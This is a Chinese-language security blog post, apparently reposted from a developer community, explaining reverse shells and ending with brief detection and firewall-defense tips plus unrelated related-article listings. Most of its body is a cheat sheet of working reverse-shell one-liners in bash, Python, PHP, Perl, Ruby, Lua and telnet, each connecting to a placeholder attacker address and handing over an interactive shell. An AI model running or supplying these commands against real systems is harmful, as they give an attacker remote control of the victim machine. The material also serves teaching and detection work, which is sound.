2022-11-10 958 發(fā)布于山東

版權(quán)

舉報

版權(quán)聲明：

本文內(nèi)容由阿里云實名注冊用戶自發(fā)貢獻，版權(quán)歸原作者所有，阿里云開發(fā)者社區(qū)不擁有其著作權(quán)，亦不承擔相應法律責任。具體規(guī)則請查看《 阿里云開發(fā)者社區(qū)用戶服務協(xié)議》和 《阿里云開發(fā)者社區(qū)知識產(chǎn)權(quán)保護指引》。如果您發(fā)現(xiàn)本社區(qū)中有涉嫌抄襲的內(nèi)容，填寫 侵權(quán)投訴表單進行舉報，一經(jīng)查實，本社區(qū)將立刻刪除涉嫌侵權(quán)內(nèi)容。

簡介： 網(wǎng)絡安全-反彈shell詳解（攻擊，檢測與防御）

簡介

如果我們需要到服務器上執(zhí)行 Shell 命令，但是因為防火墻等原因，無法由客戶端主動發(fā)起連接的情況，就可以使用反彈 Shell 來滿足登陸和操作的需求。

原理

操作受害者機器，將某開放端口的數(shù)據(jù)發(fā)送到可執(zhí)行命令的程序上，將結(jié)果返回給攻擊機。攻擊機發(fā)送向受害者開放端口發(fā)送命令，接收命令執(zhí)行結(jié)果。

反彈shell

bash

bash -i >& /dev/tcp/ip/port 0>&1

0：標準輸入；1：標準輸出；2：標準錯誤。

bash -i：產(chǎn)生一個交互式環(huán)境

>&：將標準輸出和標準錯誤結(jié)合，一起重定向給后者

/dev/tcp/ip/port：建立一個tcp連接

0>&1：將標準輸入重定向到標準輸出

nc

Linux命令-nc（端口監(jiān)控、文件傳輸、反彈shell等）_lady_killer9的博客-CSDN博客

python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

python -c command

將字符串當做python代碼執(zhí)行

同理，上面也是利用bash進行的反彈

php

php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

ruby

ruby -rsocket -e'f=TCPSocket.open("接收端ip",端口).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

telnet

mknod a p; telnet 接收端IP 端口 0<a | /bin/bash 1>a

Windows平臺，可以使用powercat   reverseudpshell   icmpsh

檢測

及時發(fā)現(xiàn)Bash進程啟動事件

檢查Bash進程是否打開了終端設備，是否有主動對外連接

防御

防火墻限制

Netlink監(jiān)聽，kill進程（詳見騰訊云參考）

參考

基于主機的反彈shell檢測思路 - 嗶哩嗶哩

常用的反彈shell總結(jié)_西部壯仔的博客-CSDN博客_反彈shell能干嘛

自動化反彈Shell防御技術 - 云+社區(qū) - 騰訊云

相關文章

網(wǎng)絡安全之盾：漏洞防御與加密技術解析

在數(shù)字時代的浪潮中，網(wǎng)絡安全和信息安全成為維護個人隱私和企業(yè)資產(chǎn)的重要防線。本文將深入探討網(wǎng)絡安全的薄弱環(huán)節(jié)—漏洞，并分析如何通過加密技術來加固這道防線。文章還將分享提升安全意識的重要性，以預防潛在的網(wǎng)絡威脅，確保數(shù)據(jù)的安全與隱私。

網(wǎng)絡安全的盾牌與劍：漏洞防御與加密技術深度解析

在數(shù)字信息的海洋中，網(wǎng)絡安全是航行者不可或缺的指南針。本文將深入探討網(wǎng)絡安全的兩大支柱——漏洞防御和加密技術，揭示它們?nèi)绾喂餐瑯?gòu)筑起信息時代的安全屏障。從最新的網(wǎng)絡攻擊手段到防御策略，再到加密技術的奧秘，我們將一起揭開網(wǎng)絡安全的神秘面紗，理解其背后的科學原理，并掌握保護個人和企業(yè)數(shù)據(jù)的關鍵技能。

網(wǎng)絡安全漏洞與防御策略：深入加密技術和安全意識的培養(yǎng)

在數(shù)字化時代，網(wǎng)絡安全的重要性日益凸顯。本文將深入探討網(wǎng)絡安全的多個維度，包括常見的網(wǎng)絡漏洞類型、加密技術的應用以及如何培養(yǎng)強大的網(wǎng)絡安全意識。通過分析這些關鍵要素，讀者將獲得保護個人和組織數(shù)據(jù)免受威脅所需的知識。

網(wǎng)絡安全的隱形盾牌：漏洞防御與加密技術

在數(shù)字化時代，網(wǎng)絡安全成為保護個人隱私和公司資產(chǎn)不可或缺的一部分。本文將探討網(wǎng)絡安全中的常見漏洞、加密技術的重要性以及提升安全意識的必要性。通過分析不同類型的網(wǎng)絡攻擊案例，我們將了解如何識別和應對這些威脅。同時，文章還將介紹基礎的加密技術概念，并通過代碼示例展示如何在實際中應用這些技術來保護數(shù)據(jù)。最后，討論為何提高個人和組織的安全意識是防范網(wǎng)絡威脅的關鍵。

網(wǎng)絡安全的盾牌與利劍：漏洞防御與加密技術的深度剖析

在數(shù)字化時代的浪潮中，網(wǎng)絡信息安全成為維護個人隱私和組織資產(chǎn)的關鍵防線。本文將深入探討網(wǎng)絡安全的核心議題，包括常見的安全漏洞、先進的加密技術以及提升整體網(wǎng)絡安全意識的重要性。通過分析最新的攻擊手段和防御策略，旨在為讀者提供一個關于如何構(gòu)建更安全網(wǎng)絡環(huán)境的實戰(zhàn)指南。

網(wǎng)絡安全與信息安全：知識分享####

【10月更文挑戰(zhàn)第21天】 隨著數(shù)字化時代的快速發(fā)展，網(wǎng)絡安全和信息安全已成為個人和企業(yè)不可忽視的關鍵問題。本文將探討網(wǎng)絡安全漏洞、加密技術以及安全意識的重要性，并提供一些實用的建議，幫助讀者提高自身的網(wǎng)絡安全防護能力。 ####

云計算與網(wǎng)絡安全：云服務、網(wǎng)絡安全、信息安全等技術領域的融合與挑戰(zhàn)

本文將探討云計算與網(wǎng)絡安全之間的關系，以及它們在云服務、網(wǎng)絡安全和信息安全等技術領域中的融合與挑戰(zhàn)。我們將分析云計算的優(yōu)勢和風險，以及如何通過網(wǎng)絡安全措施來保護數(shù)據(jù)和應用程序。我們還將討論如何確保云服務的可用性和可靠性，以及如何處理網(wǎng)絡攻擊和數(shù)據(jù)泄露等問題。最后，我們將提供一些關于如何在云計算環(huán)境中實現(xiàn)網(wǎng)絡安全的建議和最佳實踐。

相關知識

醫(yī)療器械網(wǎng)絡安全
醫(yī)療保健網(wǎng)絡安全綜合指南
醫(yī)療保健網(wǎng)絡安全解決方案
中班沉迷網(wǎng)絡安全活動教案反思
網(wǎng)絡
臨汾假期健康安全教育網(wǎng)絡課堂即將開講
你的健康信息安全嗎？了解衛(wèi)生健康行業(yè)網(wǎng)絡安全培訓的重要性
護童網(wǎng)絡安全知識，為孩子筑起數(shù)字世界的保護墻
ANSI UL醫(yī)療器械網(wǎng)絡安全標準受到美國FDA官方認可。
“守護未來 安全上網(wǎng)”未成年人網(wǎng)絡保護系列課程：網(wǎng)絡新手變達人——培養(yǎng)健康的網(wǎng)絡使用習慣專題公益講座開始招募啦!

網(wǎng)址: 網(wǎng)絡安全 http://www.u1s5d6.cn/newsview834537.html